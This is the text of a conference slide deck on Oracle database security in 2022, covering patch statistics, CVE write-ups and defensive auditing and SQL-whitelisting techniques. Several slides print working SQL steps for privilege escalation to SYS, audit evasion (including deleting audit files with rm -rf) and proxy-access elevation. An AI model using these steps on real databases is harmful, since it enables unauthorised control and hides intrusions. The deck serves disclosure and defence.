Best of Oracle Security 2022

What happened in 2022?

Alexander Kornbrust, Red-Database-Security GmbH

Introduction

What will be shown in the next 45 minutes?

! Oracle Security Patches
! Enhance Unified Auditing and Whitelist SQLs
! Outlook 2023

Database Vulnerabilities and CPU

Less security bugs than 2022

(85 in 2021, so far (until July 2022: 57))
Looks a little bit better than 2021






Oracle Vulnerabilities 2022

* until July 2022

 Oracle Vulnerabilities 2022

Number of vulnerabilities in Oracle database reduced

! 57* vulnerabilities in 2022 (2021: 85 2020:144 2019: 27, 2018: 12, 2017:
14, 2016:30 , 2015: 29, 2014: 43, 2013: 13 2012: 17)

! 1 remote exploitable bug

! 1 bug affecting Oracle clients

* until July 2022

Jan 2022 - Sep 2022

January 2022

Oracle CPU January 2022 *

Perform SYS operation without being Audited !**
Oracle database Unified Auditing and SYS Log
Limitations ***

* https://www.oracle.com/security-alerts/cpujan2022.html
** https://databasesecurityninja.wordpress.com/tag/oracle-database-cybersecurity-emad-al-mousa/
*** https://databasesecurityninja.wordpress.com/2022/01/14/oracle-database-uni ed-auditing-and-sys-log-
limitations/

fi



January 2022 CPU*

19 security fixes (0 remote exploitable)

1 RDBMS (CVSS3 2.7)

1 Java VM (CVSS3 4.3)

2 APEX (CVSS3 5.4, 3.5)

" https://www.oracle.com/security-alerts/cpujan2022.html

 January 2022 - CVE-2021-37695

ckeditor is an open source WYSIWYG HTML editor with rich

content support. A potential vulnerability has been discovered
in CKEditor 4 [Fake Objects](https://ckeditor.com/cke4/addon/
fakeobjects) package. The vulnerability allowed to inject
malformed Fake Objects HTML, which could result in executing
JavaScript code

" https://github.com/ckeditor/ckeditor4/commit/de3c001540715f9c3801aaa38a1917de46cfcf58
January 2022 - CVE-2021-32723

Some languages before 1.24.0 are vulnerable to Regular

Expression Denial of Service (ReDoS).

" https://github.com/PrismJS/prism/security/advisories/GHSA-gj77-59wh-66hg
" https://github.com/PrismJS/prism/pull/2688
https://github.com/PrismJS/prism/pull/2774


 January 2022 - CVE-2022-21247

BYPASS THE REGEXP IN THE VIEW INT$DBA_APP_STATEMENTS USING INLINE

COMMENT AND OR HINT

Expression: identified by values('ABC‘) ==> found

Expression: identified/**/by values('ABC‘) ==> not found

SQL> alter user sys identified/**/by/**/values

'S:5D0D8D0AC0CAE194BA7AFA95D80CFA6247E34C168B0EE7563CA09EC0EDF8;T:C
C3753FA694A0BEFBF45AE8A4887B5D7D50A726DAE15C9F8DBCD0E9AEB8185A8E3D1
64DFCE01A3A574A7CC7FA1452891401ACCEFE66B7136418B96E3AC5BC028F4BC8CE
82A46A0331CF3C6353D3BAA38';

SQL> alter user sys identified/**/by/**/values/

**/'S:5D0D8D0AC0CAE194BA7AFA95D80CFA6247E34C168B0EE7563CA09EC0EDF8;
T:CC3753FA694A0BEFBF45AE8A4887B5D7D50A726DAE15C9F8DBCD0E9AEB8185A8E
3D164DFCE01A3A574A7CC7FA1452891401ACCEFE66B7136418B96E3AC5BC028F4BC
8CE82A46A0331CF3C6353D3BAA38';

 Perform SYS operation without being Audited !

SQL> startup mount;

SQL> ALTER SYSTEM SET

REMOTE_LOGIN_PASSWORDFILE=’EXCLUSIVE’ SCOPE=SPFILE;

Then exit from sqlplus session , and then delete all files
under $ORACLE_BASE/audit/$ORACLE_SID that has .BIN
extension ….These files are called “auditing spillover
files”.

cd /opt/oracle/audit/ORCLCDB

rm -rf /opt/oracle/audit/ORCLCDB/*

SQL> alter database open;

SQL> exec DBMS_AUDIT_MGMT.LOAD_UNIFIED_AUDIT_FILES;

SQL> select DBUSERNAME, CLIENT_PROGRAM_NAME,

EVENT_TIMESTAMP ,ACTION_NAME, SQL_TEXT
from unified_audit_trail
where SQL_TEXT like ‘%ALTER SYSTEM SET
REMOTE_LOGIN_PASSWORDFILE’ order by EVENT_TIMESTAMP desc;

* https://databasesecurityninja.wordpress.com/tag/oracle-database-cybersecurity-emad-al-mousa/

 February 2022

CVE-2021-2175 – Database Vault Metadata

Exposure Vulnerability *

* https://databasesecurityninja.wordpress.com/2022/02/02/cve-2021-2175-database-vault-metadata-exposure-
vulnerability/
Database Vault Metadata
Exposure Vulnerability

* https://databasesecurityninja.wordpress.com/2022/02/02/cve-2021-2175-database-vault-metadata-exposure-
vulnerability/
March 2022

nothing special happened

April 2022

Oracle CPU April 2022*

* https://www.oracle.com/security-alerts/cpuapr2022.html
April 2022 CPU*

11 security fixes (0 remote exploitable)

1 Core RDBMS Shardening (CVSS3 7.2)

1 Java VM (CVSS3 6.5)

1 Oracle APEX (CVSS3 5.4)

1 RDBMS Gateway (CVSS3 5.4)

1 Oracle Spatial and Graph (CVSS3 2.8)

* https://www.oracle.com/security-alerts/cpuapr2022.html

 April 202 - CVE-2022-21410

Found by Emad Al-Mousa and Alexander Kornbrust

ESCALATION OF PRIVILEGE FROM GSMADMIN_INTERNAL TO
SYSDBA
Instead of using sys.dbms_sys_sql (via direct execution right) I
am using the new procedure SYS.execAsUser (which uses
dbms_sys_sql but no direct privilege for dbms_sys_sql needed)
This mighty procedure execasuser is explicitly granted to

ACCESSIBLE BY (PACKAGE
GSMADMIN_INTERNAL.DBMS_GSM_DBADMIN,
PACKAGE GSMADMIN_INTERNAL.DBMS_GSM_POOLADMIN,
PACKAGE GSMADMIN_INTERNAL.DBMS_GSM_COMMON,
PACKAGE
GSMADMIN_INTERNAL.DBMS_GSM_CLOUDADMIN,
PACKAGE GSMADMIN_INTERNAL.DBMS_GSM_UTILITY,
PACKAGE GGSYS.GGSHARDING,
PROCEDURE GSMADMIN_INTERNAL.EXECUTEDDL)

 April 202 - CVE-2022-21410

Run as DBA user (or any other users with create any procedure/ execute any
procedure)

SQL> create or replace PROCEDURE gsmadmin_internal.executeDDL 


(DDLID IN OUT NUMBER,
2 SCHEMA_NAME IN VARCHAR2,
3 DDL_TEXT IN CLOB DEFAULT NULL,
4 OPERATION_TYPE IN CHAR,
5 PARAMS IN VARCHAR2 DEFAULT NULL,
6 DDLACTION IN NUMBER
7 DEFAULT DBMS_GSM_COMMON.EXECDDL_DEFAULT)
8 AS
9 RUNDDL BOOLEAN;
10 REP_TYPE BINARY_INTEGER;
11 EXEC_STR VARCHAR2(256);
12 TRACE_PHRASE CLOB;
13 CHECK_DDLID NUMBER;
14 BEGIN
15
16
17
18 SYS.EXECASUSER('SYS', 'ABC');
19
20 END EXECUTEDDL;
21 /
May 2022

DBA - Rodrigo Jorge - Oracle Database

Dictionary changelog 19c/21c*

* https://www.dbarj.com.br/en/2022/05/oracle-database-dictionary-changelog/
May 2022
May 2022
May 2022
 June 2022 -

CVE-2021-35576 – Bypassing Unified Audit Policy*

https://databasesecurityninja.wordpress.com/2022/06/11/cve-2021-35576-bypassing-uni ed-audit-policy/
fi
 June 2022 - CVE-2021-35576
CREATE AUDIT POLICY SELECT_P1 actions select on
HR.EMPLOYEE;

audit policy SELECT_P1;

sqlplus / as sysdba

SQL> alter session set container=PDB1;

SQL> shutdown immediate;

SQL> startup upgrade;

SQL> select * from HR.EMPLOYEE;

SQL> startup force;

SQL> exec
SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;

 July 2022

Oracle CPU July 2022 *

Privilege Elevation in Oracle CDB Architecture –
Unauthorised Proxy Access **

" https://www.oracle.com/security-alerts/cpujul2022.html
" https://databasesecurityninja.wordpress.com/2022/07/16/privilege-elevation-in-oracle-cdb-architecture-
unauthorized-proxy-access%EF%BF%BC/

 July 2022 CPU*

27 security fixes (1 remote exploitable)

1 Core RDBMS (CVSS3 9.1)

1 Oracle Shardening (CVSS3 8.8)

! Oracle Recovery (CVSS3 7.2)

1 Java VM (CVSS3 6.5)

2 Oracle APEX (CVSS3 5.7, 5.4)

1 Liquibase (CVSS3 5.0)

1 Oracle Spatial and Graph (CVSS3 4.3)

1 Oracle Security (CVSS3 2.7)

* https://www.oracle.com/security-alerts/cpujul2022.html

July 2022 - CVE-2022-21410

Found by Alexander Kornbrust

DIFFERENT CLEARTEXT PASSWORDS WRITTEN INTO A FILE AT OS
LEVEL BY DBMS_GSM_POOLADMIN

 Privilege Elevation in Oracle CDB

Architecture – Unauthorized Proxy Access
sqlplus / as sysdba

SQL> alter session set container=ORCLPDB1;

Session altered.

SQL> create user faris identified by faris_123;

User created.

SQL> grant create session, create any procedure, execute any procedure
to faris;

Grant succeeded.

SQL> exit;

Now, connect to pluggable database ORCLPDB1 as account “”faris””:

sqlplus “faris/faris_123″@ORCLPDB1

SQL> CREATE OR REPLACE procedure wmsys.dummy

IS
BEGIN
execute immediate ‘alter user system grant connect through faris’;
END ;
/

SQL> exec wmsys.dummy;

https://databasesecurityninja.wordpress.com/2022/07/16/privilege-elevation-in-oracle-cdb-architecture-
unauthorized-proxy-access%EF%BF%BC/



August 2022
 September 2022

DOAG 2022*
AttachMe Vulnerability in OCI**

* https://anwenderkonferenz.doag.org/de/home/
** https://www.wiz.io/blog/attachme-oracle-cloud-vulnerability-allows-unauthorized-cross-tenant-volume-access

 AttachMe

* https://www.wiz.io/blog/attachme-oracle-cloud-vulnerability-allows-unauthorized-cross-tenant-volume-access

Other interesting
Oracle Security
stuff
Good to know

Enhancing Oracle Unified Auditing

Whitelisting SQL Statements

Enhancing Oracle Auditing

Anyone who evaluates audit logs often finds that the recorded
information is not very helpful in some cases.

For example, in 3-tier architectures, only the application user (e.g.

WEBUSER) and not the end user is displayed.

However, this can be adjusted with some minor changes.

As a result, one gets much more useful data for evaluation.

 Enhancing Oracle Auditing

The following fields in the Oracle Unified Auditing trail can be
enhanced.

CLIENT_IDENTIFIER - VARCHAR2(64) - Client identifier in each Oracle session

(via DBMS_APPLICATION_INFO.SET_CLIENT_INFO)

CLIENT_PROGRAM_NAME - VARCHAR2(48) - Client Program Name which issued

the
commands in user session
(via DBMS_APPLICATION_INFO.SET_MODULE)

ACTION_NAME VARCHAR2(64) - Name of the action executed by the user

(via DBMS_APPLICATION_INFO.SET_ACTION)

APPLICATION_CONTEXTS VARCHAR2(4000) - SemiColon separate list of

Application Context Namespace, Attribute, Value information in
(APPCTX_NSPACE,APPCTX_ATTRIBUTE=<value>) format
(DBMS_SESSION.SET_CONTEXT)

Enhancing Oracle Auditing -

client identifier
See Best of Oracle Security 2018
Insert custom values via Oracle Client Identifier (DBMS_SESSION)

——- glogin.sql ———

Set term off
Host echo (who am i | cut -d' ' -f1) > loguser.sql


@loguser.sql
Exec dbms_session.set_identifier('&login_user‘);
Set term on

——- glogin.sql ———

 Enhancing Oracle Auditing -

client identifier
See Best of Oracle Security 2018 ssh dbserver1 (as schmidt)
ssh dbserver1 (as weber)
su - oracle
su - oracle

sqlplus / as sysdba
sqlplus / as sysdba SQL>
SQL> create user hacker
create user cracker identified
identified as hacker;
as cracker;

SQL> select sessionid, client_identifier, os_username, dbusername,

sql_text, UNIFIED_AUDIT_POLICIES from unified_audit_trail; 


2056298984 oracle schmidt SYS create user cracker

identified by * ORA_ACCOUNT_MGMT,
ORA_CIS_RECOMMENDATIONS


2602877895 oracle weber SYS create user hacker

identified by * ORA_ACCOUNT_MGMT,
ORA_CIS_RECOMMENDATIONS

 Enhancing Oracle Auditing -

Modul/Program Name

Insert custom values via Oracle Oracle Context. This functionality is

commonly known and often used by 3rd-party applications.

DBMS_APPLICATION_INFO.SET_MODULE
DBMS_APPLICATION_INFO.SET_ACTION

Usage:
exec
dbms_application_info.set_module(module_name=>'MYMOD1',
action_name=>'MYACTION1');



 Enhancing Oracle Auditing -

context
Insert custom values via Oracle Oracle Context

Scenario:
Pass values from an web session

SQL> AUDIT CONTEXT NAMESPACE CLIENTCONTEXT ATTRIBUTES

PMNAME,FMNAME,USERID,AFTRGKEY,VSNR;



 Enhancing Oracle Auditing - context 1

Oracle has a default context call CLIENTCONTEXT. This is useful if you do not
want to create a custom context object.

1.Create Unified Audit Policy

CREATE AUDIT POLICY test_audit_policy
ACTIONS ALL ON test.tab1
EVALUATE PER SESSION
CONTAINER = CURRENT;

2. Add Context Values to Unified Auditing

AUDIT CONTEXT NAMESPACE CLIENTCONTEXT ATTRIBUTES
MYURL, WEBUSER;

3. Set the context values in your DB Session (e.g. from Java, …)

EXEC DBMS_SESSION.set_context('CLIENTCONTEXT','MYURL','order.jsp');

-- Client User-ID
EXEC DBMS_SESSION.set_context('CLIENTCONTEXT','WEBUSER','frweber1966');

4. Unified Audit Entry contains your context values frweber1966/order.jsp

SELECT application_context, ua.* FROM unified_audit_trail ua;






Enhancing Oracle Auditing - context 2

 Enhancing Oracle Auditing - context 3

Important:
Do not forget to reset the session (e.g. connection pooling)

DBMS_SESSION.RESET_PACKAGE
bzw.

sys.DBMS_SESSION.clear_all_context('parameter_ctx');

Links:
https://docs.oracle.com/database/121/DBSEG/app_context.htm#DBSEG011
https://docs.oracle.com/en/database/oracle/oracle-database/19/dbseg/
managing-security-for-application-developers.html
https://riptutorial.com/oracle/example/6852/create-a-context








Whitelisting SQL
 Whitelisting SQL

How to whitelist SQL statements

Auditing (too slow, not blocking attacks)

Oracle DB Firewall - ($$$)
3rd-party Database Activity Monitoring (e.g.
Trellis / Mcafee DAM) - ($$$)
SQL Translation Framework (no additional
license required)

 Whitelisting SQL

SQL Translation Framework

SQL Translation Framework is usually used to rewrite other SQL dialects

such as DB2 or MSSQL on-the-fly or to rewrite poor/slow SQL
commands.

In our example we use the functionality to execute only predefined

SQL commands (Whitelist).

SQL commands that are not in the whitelist are blocked and (can)
trigger an error that can be caught (via error trigger ==> SIEM).



 Whitelisting SQL

1. Create an SQL Translation Profile

2. Register SQL Translation
3. Test

https://www.robotron.de/unternehmen/aktuelles/blog/sql-translation-framework

 Whitelisting SQL
-- 1. Create Profile STF_SECURITY
dbms_sql_translator.create_profile(profile_name =>
'STF_SECURITY’);

-- 2. Register whitelisted SQL - 1st SQL

begin

dbms_sql_translator.set_attribute(
profile_name => 'STF_SECURITY‘,
attribute_name =>
dbms_sql_translator.ATTR_FOREIGN_SQL_SYNTAX,
attribute_value =>
dbms_sql_translator.ATTR_VALUE_FALSE);

dbms_sql_translator.register_sql_translation(
profile_name => 'STF_SECURITY‘,
sql_text => 'select * from tab1 where id=1‘,
translated_text => 'select * from sectest1.tab1 where
id=1' );
end;
/










 Whitelisting SQL

-- 2. Register whitelisted SQL - 2nd SQL

begin

dbms_sql_translator.set_attribute(
profile_name => 'STF_SECURITY',
attribute_name =>
dbms_sql_translator.ATTR_FOREIGN_SQL_SYNTAX,
attribute_value => dbms_sql_translator.ATTR_VALUE_FALSE
);

dbms_sql_translator.register_sql_translation(
profile_name => 'STF_SECURITY',
sql_text => 'select * from tab1 where id=3',
translated_text => 'select * from sectest1.tab1
where id=3' );
end;
/

 Whitelisting SQL
3. Test

SQL> alter session set

sql_translation_profile=schema_owner.MMI_SQLTRANS_TEST;

-— … id=1 is in the whitelist

SQL> select * from tab1 where id=1;
ID NAME PASSWORD
---------- ---------- --------------------------------
1 alex secret1

-- … id=3 is in the whitelist

SQL> select * from tab1 where id=3;

ID NAME PASSWORD
---------- ---------- --------------------------------
3 jay bik3

-- … id=3 is not whitelisted and throws an error

SQL> select * from tab1 where id=2;
*
FEHLER in Zeile 1:
ORA-00942: Tabelle oder View nicht vorhanden

-- SQL Injection attempts throws an error

SQL> select * from tab1 where id=1 or 1=1--;
*
FEHLER in Zeile 1:
ORA-00942: Tabelle oder View nicht vorhanden





Summary
 Are you prepared?
Use Auditing (Unified Auditing word 3rd-party)
Use Oracle Error Trigger
Collect all audit logs in a central repository (log collection,
SIEM)
Analyze the audit log via dashboards
Invalid Login Attempts
Insufficient Privileges
Unusual Activity
Interactive logins outside the business hours
TDE activities (ALTER SYSTEM SET…)
Usage of ANY commands (e.g. CREATE ANY …)
Potential SQL Injection Attempts from applications
(‚900','906','907','911','917','920','923','933','970','1031','1
476','1719','1722','1742','1756','1789','1790','13605','1379
7','19202','20000','24247','29257','29532','29540','31011','
31600')

Outlook
2023
Outlook 2023
More Auditing (Audit Analysis, …)
(Audit) log collection (SIEM)

Q&A
Thank you
Contact:
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany